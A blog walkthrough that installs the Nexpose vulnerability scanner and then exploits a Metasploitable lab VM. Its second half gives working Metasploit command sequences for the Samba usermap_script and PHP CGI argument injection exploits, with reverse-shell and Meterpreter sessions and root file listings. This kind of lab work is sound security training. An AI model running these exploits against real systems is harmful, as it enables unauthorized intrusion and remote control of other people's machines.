Nexpose Community Edition is a free vulnerability scanner, a single-user version of the award-winning Rapid7 Nexpose Enterprise Solution
Installed for testing on Backtrack 5R3 – Note you may require different packages to install than me. During instal it told me what I required.
Just not down any it asks for and then apt-get install (package)
Also It will ask for 8GB of Ram (Insane request! I gave it 4GB and it works)
1. Install the package which are required to run NeXpose (You may require others it will tell you what you need as you install)
root@bt:~# apt-get install libstdc++5
2. Download Nexpose Community Edition from http://www.rapid7.com/vulnerability-scanner.jsp (32bit or 64bit linux version)
3. Make the .bin bootable.
root@bt:~# chmod +x NeXposeSetup-Linux32.bin
4. Boot
root@bt:~/NeXpose#./NeXposeSetup-Linux32.bin
5. Follow the instructions on the Screen too install Nexpose
6. Login https://localhost:3780/
Installs in directory /opt/rapid7/nexpose
Results
Tested against virtual machine (Virtualbox) metasploitable https://myexploit.wordpress.com/web-application-metasploitable/
Screenshot of the results – Filtered to show all metasploit exploits. (All but two proved to be false positives)
Below clicking on Samba MS-RPC Shell link to see the exploit description you can then search for this in metasploit manually.
Manual search demonstration and exploit.
msf > search Samba “username map script” Command Execution
Matching Modules
================
Name Disclosure Date Rank Description
—- ————— —- ———–
exploit/multi/samba/usermap_script 2007-05-14 00:00:00 UTC excellent Samba “username map script” Command Execution
msf > use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > set lhost 192.168.56.102
msf exploit(usermap_script) > set rhost 192.168.56.101
msf exploit(usermap_script) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(usermap_script) > exploit
[*] Started reverse handler on 192.168.56.102:4444
[*] Command shell session 1 opened (192.168.56.102:4444 -> 192.168.56.101:60636) at 2012-12-10 12:19:50 +0000
ls -l
total 89
drwxr-xr-x 2 root root 4096 May 13 2012 bin
drwxr-xr-x 4 root root 1024 May 13 2012 boot
lrwxrwxrwx 1 root root 11 Apr 28 2010 cdrom -> media/cdrom
drwxr-xr-x 14 root root 13480 Dec 10 06:25 dev
drwxr-xr-x 95 root root 4096 Dec 10 06:25 etc
drwxr-xr-x 6 root root 4096 Apr 16 2010 home
drwxr-xr-x 2 root root 4096 Mar 16 2010 initrd
lrwxrwxrwx 1 root root 32 Apr 28 2010 initrd.img -> boot/initrd.img-2.6.24-16-server
drwxr-xr-x 13 root root 4096 May 13 2012 lib
drwx—— 2 root root 16384 Mar 16 2010 lost+found
drwxr-xr-x 4 root root 4096 Mar 16 2010 media
drwxr-xr-x 3 root root 4096 Apr 28 2010 mnt
-rw——- 1 root root 14473 Dec 10 06:25 nohup.out
And the other working exploit
msf > search PHP CGI Argument Injection
Matching Modules
================
Name Disclosure Date Rank Description
—- ————— —- ———–
exploit/multi/http/php_cgi_arg_injection 2012-05-03 00:00:00 UTC excellent PHP CGI Argument Injection
msf > use exploit/multi/http/php_cgi_arg_injection
msf exploit(php_cgi_arg_injection) > set lhost 192.168.56.102
msf exploit(php_cgi_arg_injection) > set rhost 192.168.56.101
msf exploit(php_cgi_arg_injection) > exploit
[*] Started reverse handler on 192.168.56.102:4444
[*] Sending stage (39217 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.102:4444 -> 192.168.56.101:59982) at 2012-12-10 12:24:49 +0000
meterpreter > shell
Process 5183 created.
Channel 0 created.
ls -l
total 72
drwxrwxrwt 2 root root 4096 May 20 2012 dav
drwxr-xr-x 8 www-data www-data 4096 May 20 2012 dvwa
-rw-r–r– 1 www-data www-data 891 May 20 2012 index.php
drwxr-xr-x 10 www-data www-data 4096 May 14 2012 mutillidae
drwxr-xr-x 11 www-data www-data 4096 May 14 2012 phpMyAdmin
-rw-r–r– 1 www-data www-data 19 Apr 16 2010 phpinfo.php
drwxr-xr-x 3 www-data www-data 4096 May 14 2012 test
drwxrwxr-x 22 www-data www-data 20480 Apr 19 2010 tikiwiki
drwxrwxr-x 22 www-data www-data 20480 Apr 16 2010 tikiwiki-old
drwxr-xr-x 7 www-data www-data 4096 Apr 16 2010 twiki
One thought on “information gathering – nexpose”